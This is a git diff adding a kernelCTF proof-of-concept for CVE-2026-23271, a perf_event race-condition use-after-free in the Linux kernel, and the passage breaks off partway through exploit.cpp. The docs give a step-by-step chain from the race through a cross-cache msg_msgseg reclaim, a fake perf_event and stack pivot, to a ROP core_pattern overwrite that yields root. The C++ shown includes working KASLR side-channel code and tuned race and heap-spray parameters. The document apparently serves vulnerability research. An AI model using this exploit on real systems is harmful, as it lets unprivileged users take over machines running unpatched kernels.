diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/docs/exploit.md b/pocs/linux/kernelctf/CVE-2026-23271_lts/docs/exploit.md new file mode 100644 index 000000000..b44c240ff --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23271_lts/docs/exploit.md @@ -0,0 +1,149 @@ +# Exploit + +## Exploit Primitives + +- **Vulnerable object**: `perf_event` (`perf_event_cache` slab, 0x520 bytes) +- **Primitive chain**: Race condition → time-limited UAF → stable UAF → cross-cache attack → reclaim with `msg_msgseg` → fake `perf_event` with controlled `destroy` pointer → stack pivot → ROP `core_pattern` overwrite + +## Vulnerability Overview + +There is a race between `__perf_event_overflow()` and `perf_remove_from_context()`. + +When a perf_event with `sigtrap=1` overflows, the kernel calls `task_work_add()` inside `__perf_event_overflow()` to schedule `perf_pending_task` for SIGTRAP delivery on return to userspace. If `perf_release()` runs concurrently on another thread and calls `_free_event()` → `call_rcu(free_event_rcu)` while the task_work is still queued, the `perf_event` is RCU-freed but the task_work still holds a reference to it. The subsequent `perf_pending_task` execution accesses the freed object, producing a UAF. + +The kernel detects this as a WARNING at the `WARN_ON_ONCE(!atomic_long_inc_not_zero(&event->refcount))` check in `__perf_event_overflow()`, setting the taint bit — which the exploit uses as a reliable oracle to detect when the race has been won. + +## Race Timing Diagram + +Three threads cooperate to trigger, widen, and stabilize the race: + +- **Thread 1 (Worker, CPU 0)**: Creates the tracepoint perf\_event A, triggers overflow via `futex_wait` syscall entry, then blocks in the futex to widen the race window. +- **Thread 2 (Closer, CPU 1)**: Closes the perf\_event fd to free event A via RCU, then detects the WARN and opens the spray gate. +- **Thread 3 (Spray, CPU 0)**: Heap-sprays event B into event A's freed slot before `perf_pending_task` runs. + +``` + Thread 1 (Worker, CPU 0) Thread 2 (Closer, CPU 1) Thread 3 (Spray, CPU 0) + ======================== ========================= ======================== + + [1] perf_event_open(type=TRACEPOINT, + config=577 /* sys_enter_futex */, + sigtrap=1, sample_period=1) + [a] close(perf_event_fd) + [2] futex_wait(&futex_word, 0) | + (futex_word is a userspace global, + initially 0; expected_val=0) + | v + | (syscall entry) perf_event_release_kernel + v | + syscall_trace_enter | + perf_syscall_enter | + perf_trace_buf_submit | + perf_tp_event | + for_each_event: | + event A found on list ···> [b] perf_remove_from_context + (event A still on list (removes event A from list, + at this point) but Thread 1 already holds + a reference to it) + perf_swevent_event [c] put_event + (240-term filter atomic_long_dec_and_test + evaluation → refcount = 0 + widens race window) | + __perf_event_overflow v + _free_event + [3] task_work_add(current, __free_event + &event->pending_task, call_rcu(&event->rcu_head, + TWA_RESUME) free_event_rcu) + WARN_ON_ONCE( | + !atomic_long_inc_not_zero( | + &event->refcount)) | + WARNING fires | + | [d] detect WARNING + | poll /proc/sys/kernel/tainted + | to check if taint bit set + | + v + do_futex → futex_wait_setup → + enters wait queue, calls schedule() + | [A] RCU grace period completes + | (free_event_rcu executes, + | event A returned to slab) + | spray: perf_event_open() + | → event B allocated in + | event A's freed slot + | + v + [5] futex_wait returns to userspace + resume_user_mode_work + task_work_run + perf_pending_task ← UAF + put_event(event) + 'event' now points to event B + → event B refcount decremented to 0 + → event B freed via RCU + → userspace still holds FD to event B + → DANGLING FD (stable, reusable UAF) +``` + +## Exploitation + +### Race Constraints (all must hold for successful exploitation) + +1. **Thread 1 `perf_tp_event` before Thread 2 `perf_remove_from_context`**: The tracepoint handler must find event A on the event list before the closer removes it. + +2. **Thread 2 `put_event` before Thread 1 `WARN_ON_ONCE`**: Event A's refcount must reach 0 (via `put_event`) before `__perf_event_overflow` tries `atomic_long_inc_not_zero`. If refcount > 0, the increment succeeds silently and no UAF occurs. The 240-term filter expression widens this window by increasing `filter_match_preds` execution time. + +3. **`free_event_rcu` before Thread 1 `perf_pending_task`**: Event A must be returned to the slab (via RCU callback) before `perf_pending_task` accesses it. The exploit ensures this by: (a) having the worker block in `futex_wait` to trigger an RCU quiescent state, and (b) calling `synchronize_rcu()` via `MEMBARRIER_CMD_GLOBAL`. + +4. **Thread 3 spray before Thread 1 `perf_pending_task`**: Event B must occupy event A's freed slot before `perf_pending_task` runs `put_event`. The exploit achieves this by keeping the worker blocked in `futex_wait` until event B has completed, then waking it via `FUTEX_WAKE`. + +### From Transient WARNING to Stable Dangling FD + +The exploit converts a narrow, non-deterministic race into a stable UAF primitive in three stages: + +1. **Transient race → WARNING**: The race between `__perf_event_overflow()` and `perf_remove_from_context()` is inherently narrow (~microseconds). The 240-term filter expression and `futex_wait` blocking widen it. When the race succeeds, the kernel fires a WARNING via `__warn()`, which calls `add_taint(TAINT_WARN)` after printk completes. The exploit detects this via `/proc/sys/kernel/tainted` polling or wake-failure heuristic. + +2. **WARNING → Spray reclaim**: After detecting the race win, the exploit opens the spray gate. Multiple pre-created threads create new perf\_events to reclaim event A's freed slab slot. One of these (event B) occupies event A's slot. + +3. **Spray reclaim → Dangling FD**: When `perf_pending_task` runs as task\_work on the worker's return to userspace, it calls `put_event(event)` on what it believes is event A — but the memory now belongs to event B. This decrements event B's refcount to 0, triggering `_free_event` on event B. However, the spray thread still holds an open FD to event B. This FD is now a **dangling pointer** — it references freed memory that can be reclaimed by arbitrary kernel objects (e.g., `msg_msgseg` via cross-cache attack), enabling controlled read/write and ultimately ROP. + +### From Dangling FD to Controlled Memory + +With the dangling FD for event B, the exploit converts it into attacker-controlled memory in three steps: + +1. **Spray & locate victim**: Spray perf\_events (event B) to reclaim event A's freed slab slot, then probe with additional events (event C) one at a time. Each perf\_event has a unique kernel-assigned ID (monotonically increasing), readable via `ioctl(PERF_EVENT_IOC_ID)`. Before probing, the exploit records every event B FD's original ID. After each event C allocation, it re-reads all event B IDs — if a event B FD's ID has changed from its recorded value, it means event C landed in the same memory and overwrote that slot. This event B FD is now the `victim_perf_fd`. +2. **Cross-cache attack**: Free all perf\_events in the victim's slab region, flush them from the SLUB `cpu_partial` list, and return the empty slab pages to the buddy system. +3. **`msg_msgseg` reclaim**: Spray `msg_msgseg` objects (via `msgsnd`) to reclaim the freed buddy pages. The `victim_perf_fd` now points to attacker-controlled `msg_msgseg` memory. + +### ID Oracle (Victim Identification) + +The exploit needs to determine which `msg_msgseg` overlaps the freed `perf_event` and at what offset. It uses a two-stage approach: + +**Stage 1 — Probe payload**: Each `msg_msgseg` is filled with a unique stamp pattern: `(msg_idx << 32) | buffer_offset` at every 8-byte position. Critical fields (`ctx`, `parent`) are patched to valid values (`core_pattern` address, 0) to prevent kernel crashes if a close happens on the reclaimed event. + +**Stage 2 — Oracle read**: The exploit calls `ioctl(PERF_EVENT_IOC_ID)` on `victim_perf_fd`. Since the underlying memory is now a `msg_msgseg`, the `event->id` field contains the stamp pattern. From this, the exploit extracts: +- The victim `msg_queue_ids` index (`id_val >> 32`) +- The exact byte offset of the event within the segment (`id_val & 0xFFFFFFFF`) + +### ROP and Privilege Escalation + +With the victim segment and offset known, the exploit builds a fake `perf_event` payload with safety fields (NULL out `ctx`, `rb`, `prog`, `cgrp`, `addr_filters` to skip cleanup paths; set `refcount=1` so `_free_event` triggers) and a `destroy` pointer set to a stack pivot gadget (`push rbx; pop rsp; pop rbp; ret`). The ROP chain at event+0x8 calls `_copy_from_user` to overwrite the kernel's `core_pattern` with `|/proc/%P/fd/666 %P`, then calls `msleep` to freeze the kernel thread. + +Since a `perf_event` (0x520 bytes) is larger than a single `msg_msgseg` (0x400 bytes), the fake event payload inevitably spans two adjacent segments. The exploit handles this by spraying a "universal neighbor payload" into segments adjacent to the victim (window +/-16), overlaying both prev-segment and next-segment positions so the payload is valid regardless of which neighbor contains the other half. The victim segment itself is then sprayed with the exact-offset payload. Closing `victim_perf_fd` triggers `perf_release()` → `_free_event()` → `event->destroy(event)` → stack pivot → ROP chain execution. + +A previously forked child process polls `/proc/sys/kernel/core_pattern`. Once overwritten, it crashes via NULL dereference, causing the kernel to execute the exploit binary as root (via fd 666 `memfd`). The binary uses `pidfd_open` + `pidfd_getfd` to steal the parent's stdio FDs and runs `cat /flag`. + +### KASLR Leak (Prefetch Side-Channel) + +To bypass KASLR we refer to this [technique](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-6817_mitigation/docs/exploit.md#kaslr-bypass). + +In the CI environment, `leak_kaslr_base` from libxdk is used. For manual testing on remote VMs, a separate Intel-optimized variant (`bypass_kaslr`) is selected. + +## kernelXDK Integration + +The exploit uses [kernelXDK](https://github.com/google/kernel-research) (libxdk) to decouple target-specific information from the exploit logic: + +- **Target detection**: `TargetDb` + `AutoDetectTarget()` identifies the running kernel +- **Symbol resolution**: `GetSymbolOffset()` for `msleep`, `_copy_from_user`, `core_pattern`, and ROP gadgets +- **Structure offsets**: `GetFieldOffset()` for `perf_event` fields (`destroy`, `ctx`, `rb`, `pmu`, `refcount`, etc.) +- **ROP chain construction**: `RopChain::Add()` with KASLR-adjusted addresses +- **KASLR bypass**: `leak_kaslr_base()` for CI environments diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2026-23271_lts/docs/vulnerability.md new file mode 100644 index 000000000..8639e78e4 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23271_lts/docs/vulnerability.md @@ -0,0 +1,30 @@ +# Vulneribility + +There is a race between `__perf_event_overflow()` and `perf_remove_from_context()`. + +For software/tracepoint-driven perf events, overflow handling could run with only +preemption disabled (not hard IRQ disabled). In that context, teardown paths such as +`perf_event_release_kernel()` -> `perf_remove_from_context()` could make progress +concurrently and invalidate callback-related event state still used by the overflow path +(for example `event->pending_task`), leading to use-after-free. + + +## Requirements to trigger the vulnerability + - Capabilities: None + - Kernel configuration: `CONFIG_PERF_EVENTS=y` + - User namespaces required: No + +## Commit which introduced the vulnerability + - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=592903cdcbf6 + +## Commit which fixed the vulnerability + - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c9bc1753b3cc41d0e01fbca7f035258b5f4db0ae + +## Affected kernel versions + - 2.6.31-rc1 - 7.0-rc2 + +## Affected component, subsystem + - perf + +## Cause + - race condition diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/Makefile b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/Makefile new file mode 100644 index 000000000..b4aa2293c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/Makefile @@ -0,0 +1,16 @@ +KERNELXDK_INCLUDE_DIR ?= /usr/local/include +KERNELXDK_LIB_DIR ?= /usr/lib + +CXXFLAGS = -O2 -Wall -static -pthread -I. -I$(KERNELXDK_INCLUDE_DIR) +LDFLAGS = -L$(KERNELXDK_LIB_DIR) -lkernelXDK + +exploit: exploit.cpp target_db.kxdb + g++ $(CXXFLAGS) -o $@ $< $(LDFLAGS) + +target_db.kxdb: + wget -O target_db.kxdb https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb + +clean: + rm -f exploit exploit_debug target_db.kxdb + +.PHONY: clean diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/exploit b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/exploit new file mode 100755 index 000000000..703b9c45a Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/exploit.cpp b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/exploit.cpp new file mode 100644 index 000000000..1dd13511c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/exploit.cpp @@ -0,0 +1,2491 @@ +extern "C" { +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +} + +#include +#include +#include +#include + +#include +#include +#include +#include +#include + +namespace { + +constexpr uint64_t KASLR_START = 0xFFFFFFFF81000000ULL; +constexpr uint64_t KASLR_END = KASLR_START + 0x40000000ULL; +constexpr uint64_t KASLR_SLOT_SIZE = 0x200000ULL; + +inline __attribute__((always_inline)) uint64_t rdtsc_begin_() { + uint64_t a, d; + asm volatile("mfence\n\t" "rdtscp\n\t" + "mov %%rdx, %0\n\t" "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" "lfence\n\t" + : "=r"(d), "=r"(a) :: "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} +inline __attribute__((always_inline)) uint64_t rdtsc_end_() { + uint64_t a, d; + asm volatile("xor %%rax, %%rax\n\t" "lfence\n\t" "rdtscp\n\t" + "mov %%rdx, %0\n\t" "mov %%rax, %1\n\t" "mfence\n\t" + : "=r"(d), "=r"(a) :: "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} +inline __attribute__((always_inline)) void prefetch_(uint64_t addr) { + asm volatile("prefetchnta (%0)\n\t" "prefetcht2 (%0)\n\t" : : "r"(addr)); +} +inline size_t sidechannel_(uint64_t addr) { + size_t t = rdtsc_begin_(); + prefetch_(addr); + return rdtsc_end_() - t; +} +inline uint64_t slot_to_addr_(size_t slot) { return KASLR_START + (slot * KASLR_SLOT_SIZE); } +inline uint64_t abs_diff_(uint64_t a, uint64_t b) { return a > b ? a - b : b - a; } +inline uint64_t compute_median_(std::vector v) { + size_t n = v.size() / 2; + std::nth_element(v.begin(), v.begin() + n, v.end()); + return v[n]; +} +inline std::optional try_find_edge_(const std::vector &timings, uint64_t window_size) { + if (timings.size() < window_size) return std::nullopt; + uint64_t median = compute_median_(timings); + uint64_t cur = 0; + for (size_t k = 0; k < window_size; k++) cur += abs_diff_(timings[k], median); + uint64_t best = cur; + std::optional best_slot = 0; + for (size_t i = 1; i <= timings.size() - window_size; i++) { + cur -= abs_diff_(timings[i - 1], median); + cur += abs_diff_(timings[i + window_size - 1], median); + if (cur > best) { best = cur; best_slot = i; } + } + return best_slot; +} +inline std::optional try_leak_kaslr_base_(uint64_t window_size, int samples) { + size_t slots = (KASLR_END - KASLR_START) / KASLR_SLOT_SIZE; + std::vector timings(slots, std::numeric_limits::max()); + for (int i = 0; i < samples; i++) + for (size_t s = 0; s < slots; s++) { + uint64_t t = sidechannel_(slot_to_addr_(s)); + if (t < timings[s]) timings[s] = t; + } + auto slot = try_find_edge_(timings, window_size); + if (slot) return slot_to_addr_(*slot); + return std::nullopt; +} +inline std::optional find_majority_(const std::vector> &slots) { + uint64_t cand = 0; size_t count = 0; + for (const auto &s : slots) { + if (count == 0) { if (s) { cand = *s; count = 1; } } + else if (s && *s == cand) count++; else count--; + } + size_t actual = 0; + for (const auto &s : slots) if (s && *s == cand) actual++; + if (actual > slots.size() / 2) return cand; + return std::nullopt; +} + +} // namespace + +static uint64_t leak_kaslr_base_local(uint64_t window_size, int samples, int trials) { + std::vector> cands; + for (int i = 0; i < trials; i++) cands.push_back(try_leak_kaslr_base_(window_size, samples)); + auto base = find_majority_(cands); + if (!base) throw ExpKitError("Failed to leak KASLR base"); + return *base; +} + +INCBIN(target_db, "target_db.kxdb"); +__asm__(".section .text\n"); + +#ifndef SYS_pidfd_getfd +#ifdef __NR_pidfd_getfd +#define SYS_pidfd_getfd __NR_pidfd_getfd +#else +#define SYS_pidfd_getfd 438 +#endif +#endif + +#define log_info(fmt, ...) dprintf(2, "[+] " fmt "\n", ##__VA_ARGS__) +#define log_warn(fmt, ...) dprintf(2, "[-] " fmt "\n", ##__VA_ARGS__) +#define log_dbg(fmt, ...) dprintf(2, "[*] " fmt "\n", ##__VA_ARGS__) +#define die(fmt, ...) \ + do { \ + log_warn(fmt, ##__VA_ARGS__); \ + exit(1); \ + } while (0) + +#ifndef SPRAY_C_COUNT +#define SPRAY_C_COUNT 0x80 +#endif +#ifndef SPRAY_B_COUNT +#define SPRAY_B_COUNT 0x400 +#endif +#define DRAIN_COUNT (0x20) + +static int vuln_trigger_mode = 0; + + +#ifndef MEMBARRIER_CMD_GLOBAL +#define MEMBARRIER_CMD_GLOBAL (1 << 0) +#endif +#ifndef MEMBARRIER_CMD_Register_PRIVATE_EXPEDITED +#define MEMBARRIER_CMD_REGISTER_PRIVATE_EXPEDITED (1 << 4) +#endif +#ifndef MEMBARRIER_CMD_PRIVATE_EXPEDITED +#define MEMBARRIER_CMD_PRIVATE_EXPEDITED (1 << 3) +#endif +#ifndef __NR_membarrier +#define __NR_membarrier 324 +#endif + +#define OBJS_PER_SLAB 12 +#define MIN_PARTIAL 5 +#define CPU_PARTIAL 24 +#define PADDINGS 11 +#define EMPTY_SLABS (MIN_PARTIAL + PADDINGS) +#define EVICT_SLABS 12 + + +#define TOTAL_OBJS ((EMPTY_SLABS + EVICT_SLABS) * OBJS_PER_SLAB) + + +#define PERF_EVENT_SIZE (0x520) +#define MSG_SPRAY_COUNT 0x180 +#define MSG_FAKE_A_COUNT 0x40 +#define MSG_FAKE_B_COUNT 0x20 +#define MSG_SEG_SIZE (0x400) +#define MSG_SEG_HEADER_SZ (8) +#define MSG_SEG_PAYLOAD_SIZE (MSG_SEG_SIZE - MSG_SEG_HEADER_SZ) +#define MSG_SPRAY_SIZE (PAGE_SIZE + MSG_SEG_PAYLOAD_SIZE) +#define MSG_HEADER_SZ 48 +#define MSG_MSG_PAYLOAD_SZ (PAGE_SIZE - MSG_HEADER_SZ) +#define MTEXT_SIZE (MSG_SEG_PAYLOAD_SIZE + MSG_MSG_PAYLOAD_SZ) + +#define MSG_COPY 040000 + +int target_perf_fd = 0; +uint64_t target_perf_id = 0; +int perf_fd_idx = -1; +int victim_perf_fd = -1; +int victim_perf_idx = -1; +uint64_t victim_perf_id = -1; +int spray_c_count = 0; + +static volatile int stop_threads = 0; +static volatile int exit_threads = 0; +static int spray_c_fds[SPRAY_C_COUNT]; +static int spray_b_fds[SPRAY_B_COUNT]; +static int total_fds[TOTAL_OBJS]; + +static uint64_t spray_b_ids[SPRAY_B_COUNT]; +static uint8_t spray_b_id_valid[SPRAY_B_COUNT]; +static int drain_fds[2*DRAIN_COUNT]; +int sync_pipe[2]; +int msg_queue_ids[MSG_SPRAY_COUNT]; +int msg_fake_ids[MSG_FAKE_A_COUNT + MSG_FAKE_B_COUNT]; + +__attribute__((constructor)) static void init_msg_ids() { + memset(msg_queue_ids, -1, sizeof(msg_queue_ids)); + memset(msg_fake_ids, -1, sizeof(msg_fake_ids)); +} + +static pid_t crash_child_pid = -1; + +/* ================================================================ + * New TP Code Start + * ================================================================ + */ + +#ifndef TRAP_PERF +#define TRAP_PERF 6 +#endif + +#ifndef __NR_perf_event_open +#define __NR_perf_event_open 298 +#endif + +#define TP_TAINT_WARN_MASK 512L + +/* v10 staged profiles: + * A: 577 0 0 1 4000 1 240 20 0 0 1 2000 0 (100ms prewake hold) + * B: 577 0 0 1 12000 1 240 20 0 0 1 2000 0 (160ms prewake hold) + */ +#define TP_FIXED_EVENT_ID 577 +#define TP_FIXED_DELAY_NS 0 +#define TP_FIXED_TRIES_PER_ROUND 4000 +#define TP_FIXED_MODE 1 +#define TP_FIXED_FILTER_TERMS 240 +#define TP_FIXED_FUTEX_TIMEOUT_MS 2000 +#define TP_FIXED_HOG_NS 0 +#define TP_FIXED_VERBOSE 0 +#define TP_FIXED_DRAIN_EVERY 1 +#define TP_FIXED_DRAIN_SLEEP_US 2000 +#define TP_FIXED_PRIME_EVERY 0 +#define TP_FIXED_TARGET_SLOT_RCU_WAIT_US 2000 +#define TP_FIXED_WAKE_DELAY_NS 800000 +#define TP_FIXED_WAKE_ARM_SPINS 80000 +#define TP_FIXED_POST_CLOSE_GRACE_NS 100000 +#define TP_FIXED_WAKE_RETRY_COUNT 10 +#define TP_FIXED_WAKE_RETRY_GAP_NS 50000 +#define TP_FIXED_LATE_WAKE_GRACE_NS 800000 +#define TP_FIXED_WARN_HOLD_MAX_NS 30000000 +#define TP_FIXED_WARN_HOLD_AFTER_SPRAY_NS 1000000 +#define TP_FIXED_WARN_WAKE_PREDELAY_NS 100000000 +#define TP_PROFILE_B_WARN_WAKE_PREDELAY_NS 160000000 +#define TP_PROFILE_B_TRIES_PER_ROUND 12000 +#define TP_FIXED_PREWAKE_TAINT_POLL_MAX_NS 20000000 +#define TP_FIXED_PREWAKE_TAINT_POLL_STEP_NS 100000 +#define TP_FIXED_LATE_TAINT_POLL_MAX_NS 50000000 +#define TP_FIXED_LATE_TAINT_POLL_STEP_NS 200000 +#define TP_FIXED_WARN_WAKE_EXTEND_MAX_NS 50000000 +#define TP_FIXED_WARN_WAKE_EXTEND_GAP_NS 100000 +#define TP_ORACLE_PASSES 10 +#define TP_ORACLE_PASS_GAP_US 500 +#define TP_BASELINE_POLL_US 200 +#define TP_BASELINE_WAIT_NS 50000000 +#define TP_BASELINE_MIN_VALID_IDS 64 +#define TP_SPRAY_PHASEA_COUNT 128 +#define TP_SPRAY_PHASEB_BASE_DELAY_NS 1000 +#define TP_SPRAY_PHASEB_STEP_NS 500 +#define TP_SPRAY_PHASEB_STEPS 64 +#define TP_SPRAY_FIRST_ALLOC_WAIT_NS 2000000 +#define TP_SPRAY_DONE_WAIT_NS 2000000000ULL +#define TP_GATE_RELEASE_DELAY_NS 70000000 +#define TP_MAX_ROUNDS 2 + +static volatile int tp_warn_hit = 0; +static volatile int tp_race_success = 0; +static volatile int tp_spray_gate = 0; /* 0=wait, 1=start, -1=abort */ +static volatile sig_atomic_t tp_sigtrap_count = 0; +static volatile uint64_t tp_last_sigtrap_ns = 0; +static volatile uint64_t tp_warn_gate_open_ns = 0; +static volatile uint64_t tp_first_spray_alloc_ns = 0; +static volatile int tp_first_spray_alloc_idx = -1; +static volatile int tp_spray_open_done = 0; +static volatile int tp_futex_word = 0; +static volatile int tp_perf_fd = -1; + +enum tp_fail_reason { + TP_FAIL_NONE = 0, + TP_FAIL_WARN_MISS = 1, + TP_FAIL_ORACLE_NO_VICTIM = 2, + TP_FAIL_ORACLE_BAD_INDEX = 3, + TP_FAIL_FINAL_FAILED = 4, +}; + +static volatile int tp_oracle_hit = 0; +static volatile int tp_victim_msg_idx = -1; +static volatile int tp_final_stage_entered = 0; +static volatile int tp_final_result = 0; +static volatile int tp_fail_reason = TP_FAIL_NONE; + +/* Keep template globals for compatibility with legacy helper code in this file. */ +static int g_event_id = TP_FIXED_EVENT_ID; +static int g_num_cpus = 1; + +/* Defined later in the legacy block; declared here for TP slot-drain helpers. */ +void user_synchronize_rcu(void); + +struct tp_run_cfg { + int event_id; + int delay_ns; + int tries_per_round; + int mode; + int filter_terms; + int futex_timeout_ms; + int hog_ns; + int verbose; + int drain_every_attempts; + int drain_sleep_us; + int prime_every_attempts; + int warn_wake_predelay_ns; + const char *profile_name; +}; + +struct tp_sched_cfg { + int worker_cpu; + int closer_cpu; + int worker_policy; + int worker_prio; + int closer_policy; + int closer_prio; + int hog_policy; + int hog_prio; +}; + +struct tp_attempt_ctx { + volatile int closer_ready; + volatile int hog_ready; + volatile int event_ready; + volatile int event_failed; + volatile int start_close; + volatile int wait_armed; + + int delay_ns; + int hog_ns; + int futex_timeout_ms; + int event_id; + const char *filter_expr; + struct tp_sched_cfg sched; + int verbose; + int do_prime; + int target_slot_idx; + + int futex_ret; + int futex_errno; + int sigtrap_before_wait; + int sigtrap_after_wait; + uint64_t t_before_futex_wait_ns; + uint64_t t_after_futex_wait_ns; + uint64_t t_last_sigtrap_ns; + uint64_t t_worker_write_ns; + uint64_t t_closer_close_ns; + uint64_t t_wake_ns; + int wake_ret; + int wake_errno; + int wake_final_ret; + int wake_final_errno; + int wake_calls; + int wake_hit_total; + int wake_store1_fallback; + int wake_warn_extend_used; + uint64_t wake_warn_extend_ns; + int late_taint_poll_reads; + int warn_seen_pre_wake; + int warn_seen_stage; /* 0=none,1=pre,2=late,3=speculative */ + int spray_gate_opened; + int spray_seen_pre_wake; + uint64_t warn_hold_ns; + uint64_t warn_wake_predelay_ns; + int warn_hold_applied; + uint64_t warn_hold_applied_ns; + int warn_wake_predelay_target_ns; + uint64_t first_warn_detect_ns; + uint64_t warn_detect_to_first_wake_ns; + int taint_poll_reads; + uint64_t taint_poll_ns; +}; + +static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, + int cpu, int group_fd, unsigned long flags) +{ + return syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags); +} + +static long do_futex(volatile int *uaddr, int futex_op, int val, + const struct timespec *timeout, + volatile int *uaddr2, int val3) +{ + return syscall(SYS_futex, uaddr, futex_op, val, timeout, uaddr2, val3); +} + +static uint64_t get_time_ns(void) +{ + struct timespec ts; + + clock_gettime(CLOCK_MONOTONIC_RAW, &ts); + return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec; +} + +static void tp_spin_delay_ns(uint64_t delay_ns); +static void tp_cpu_relax_once(void); +static int tp_try_open_spray_gate(uint64_t gate_open_ns); + +static void tp_maybe_apply_warn_wake_hold(struct tp_attempt_ctx *ctx) +{ + uint64_t hold_start; + uint64_t target_ns; + + if (!ctx || !ctx->warn_seen_stage || ctx->warn_hold_applied) + return; + + target_ns = (ctx->warn_wake_predelay_target_ns > 0) ? + (uint64_t)ctx->warn_wake_predelay_target_ns : 0ULL; + if (!target_ns) + return; + + hold_start = get_time_ns(); + tp_spin_delay_ns(target_ns); + ctx->warn_wake_predelay_ns = get_time_ns() - hold_start; + ctx->warn_hold_applied = 1; + ctx->warn_hold_applied_ns = ctx->warn_wake_predelay_ns; +} + +static void tp_warn_open_gate_and_wait_spray(struct tp_attempt_ctx *ctx, uint64_t hold_start_ns) +{ + if (!ctx) + return; + + if (tp_try_open_spray_gate(hold_start_ns)) + ctx->spray_gate_opened = 1; + + while ((get_time_ns() - hold_start_ns) < TP_FIXED_WARN_HOLD_MAX_NS) { + uint64_t first_alloc_ns = __atomic_load_n(&tp_first_spray_alloc_ns, __ATOMIC_ACQUIRE); + uint64_t elapsed_ns = get_time_ns() - hold_start_ns; + + if (first_alloc_ns > 0) { + ctx->spray_seen_pre_wake = 1; + if (elapsed_ns >= TP_FIXED_WARN_HOLD_AFTER_SPRAY_NS) + break; + } + + tp_cpu_relax_once(); + } +} + +static void tp_cpu_relax_once(void) +{ +#if defined(__x86_64__) || defined(__i386__) + __asm__ __volatile__("pause" ::: "memory"); +#else + __asm__ __volatile__("" ::: "memory"); +#endif +} + +static void tp_spin_delay_ns(uint64_t delay_ns) +{ + uint64_t start; + + if (!delay_ns) + return; + + start = get_time_ns(); + while ((get_time_ns() - start) < delay_ns) + tp_cpu_relax_once(); +} + +static void tp_set_thread_affinity(int cpu) +{ + cpu_set_t mask; + + if (cpu < 0) + return; + + CPU_ZERO(&mask); + CPU_SET(cpu, &mask); + (void)sched_setaffinity(0, sizeof(mask), &mask); +} + +static void tp_set_thread_sched_best_effort(const char *role, int policy, int prio, int verbose) +{ + struct sched_param sp; + int ret; + + if (policy == SCHED_OTHER) + return; + + memset(&sp, 0, sizeof(sp)); + sp.sched_priority = prio; + + ret = pthread_setschedparam(pthread_self(), policy, &sp); + if (ret == 0) + return; + + if (verbose) { + if (ret == EPERM || ret == EACCES) + log_warn("[sched] %s no RT permission (policy=%d prio=%d)", role, policy, prio); + else + log_warn("[sched] %s pthread_setschedparam failed: %s", role, strerror(ret)); + } +} + +static int tp_read_kernel_tainted(long *value_out) +{ + FILE *fp; + long v; + + if (!value_out) + return -1; + + fp = fopen("/proc/sys/kernel/tainted", "r"); + if (!fp) + return -1; + + if (fscanf(fp, "%ld", &v) != 1) { + fclose(fp); + return -1; + } + + fclose(fp); + *value_out = v; + return 0; +} + +static int tp_taint_warn_bit_set(long tainted) +{ + return ((tainted & TP_TAINT_WARN_MASK) != 0) ? 1 : 0; +} + +static int tp_try_open_spray_gate(uint64_t gate_open_ns) +{ + int expected = 0; + + if (__atomic_compare_exchange_n(&tp_spray_gate, &expected, 1, 0, + __ATOMIC_ACQ_REL, __ATOMIC_ACQUIRE)) { + __atomic_store_n(&tp_warn_gate_open_ns, gate_open_ns, __ATOMIC_RELEASE); + return 1; + } + + return 0; +} + +static void tp_user_membarrier_global(void) +{ + (void)syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); +} + +static void tp_maybe_low_freq_drain(const struct tp_run_cfg *cfg, unsigned long attempt_seq) +{ + struct timespec ts; + + if (!cfg || cfg->drain_every_attempts <= 0 || cfg->drain_sleep_us <= 0) + return; + + if (attempt_seq == 0 || (attempt_seq % (unsigned long)cfg->drain_every_attempts) != 0) + return; + + tp_user_membarrier_global(); + + ts.tv_sec = cfg->drain_sleep_us / 1000000; + ts.tv_nsec = (long)(cfg->drain_sleep_us % 1000000) * 1000L; + (void)nanosleep(&ts, NULL); + + tp_user_membarrier_global(); +} + +static void tp_sigtrap_handler(int sig, siginfo_t *info, void *ucontext) +{ + (void)sig; + (void)ucontext; + + tp_sigtrap_count++; + __atomic_store_n(&tp_last_sigtrap_ns, get_time_ns(), __ATOMIC_RELEASE); + if (!info || info->si_code != TRAP_PERF) + log_warn("[tp] unexpected SIGTRAP si_code=%d", info ? info->si_code : -1); +} + +static const char *tp_futex_wait_state_string(int futex_ret, int futex_errno) +{ + if (futex_ret == 0) + return "wake_ok"; + if (futex_ret == -1 && futex_errno == EAGAIN) + return "eagain"; + if (futex_ret == -1 && futex_errno == ETIMEDOUT) + return "timedout"; + if (futex_ret == -1 && futex_errno == EINTR) + return "eintr"; + return "other"; +} + +static const char *tp_fail_reason_string(int reason) +{ + switch (reason) { + case TP_FAIL_NONE: + return "none"; + case TP_FAIL_WARN_MISS: + return "warn_miss"; + case 